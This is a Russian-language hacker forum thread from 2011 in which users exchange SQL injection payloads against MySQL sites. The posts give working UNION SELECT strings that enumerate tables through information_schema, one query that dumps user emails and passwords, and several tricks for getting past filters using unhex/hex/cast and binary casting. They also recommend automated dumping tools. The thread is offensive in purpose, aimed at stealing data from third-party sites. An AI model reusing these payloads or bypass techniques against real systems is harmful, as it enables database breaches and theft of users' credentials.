
07.02.2011, 01:12
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Спасибо. Но тогда возникает вопрос по проге.
В ней надо что бы заканчивался запрос на +limit+
Как это сделать со стандартной скулей?
UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
|
|
|

07.02.2011, 01:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Fooog
Спасибо. Но тогда возникает вопрос по проге.
В ней надо что бы заканчивался запрос на +limit+
Как это сделать со стандартной скулей?
UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
тут просто даеш проге так:
pxxp://site.com/script.php?id=1 UNION SELECT 1,2,,4 ,5 FROM INFORMATION_SCHEMA.TABLES+limit+
а в поле "Что нужно сдампить" ставиш TABLE_NAME
воббще если надо сначала тока табли слит быстро то вот так можно:
pxxp://site.com/script.php?id=1 UNION SELECT 1,2,(select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables),4 ,5 --
выдает все табли разом в хексе
|
|
|

07.02.2011, 01:51
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от YuNi|[c
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
POST запросы поддерживаются в версии 2.0
Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась
https://rdot.org/forum/showthread.php?t=1142
Добавил версию 2.0 /showpost.php?p=2544529&postcount=10
|
|
|

07.02.2011, 02:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Redwood
POST запросы поддерживаются в версии 2.0, просто я не обратил внимание какая версия выложена в топике, думал что она и есть, сейчас добавлю.
Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась https://rdot.org/forum/showthread.php?t=1142
я не посмотрель что ты выложил, у меня уже был какой то версия.
Ну тулзу я пробовал новую версию, но тоже не может хавать такие запросы
тут даже попросил кодерам подсказать или наколбасит
пару строк на перле именно для таких скулей(правда там дал я на одну колонку а тут две колонки)
/showthread.php?p=2536279
остался без ответа там
|
|
|

07.02.2011, 19:51
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
|
|
|

07.02.2011, 20:07
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Чакэ
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
http://forum.antichat.net/thread104591.html
Вопрос №2
|
|
|

07.02.2011, 20:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Чакэ
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
да Redwood точно указал еще можно так:
unhex(Hex(cast(Version() as char)))
cast(Version()+as+binary)
|
|
|

07.02.2011, 20:30
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Redwood, очень благодарен cast(concat_ws(0x3a,version(),user(),database())+a s+binary) - true
|
|
|

07.02.2011, 21:39
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Вытянул дб, а нужные колонки в таком виде 000000060664599b, чем расшифровать? или подскажите алгоритм, который используется ...
Все разобрался, это уникальный идентификатор присвоенный скриптом ...
|
|
|

07.02.2011, 22:36
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Вот. Нашел на свой вопрос удобный ответ. Товарищ помог
group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME)
Вдруг кому понадобиться.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
|
|
|
|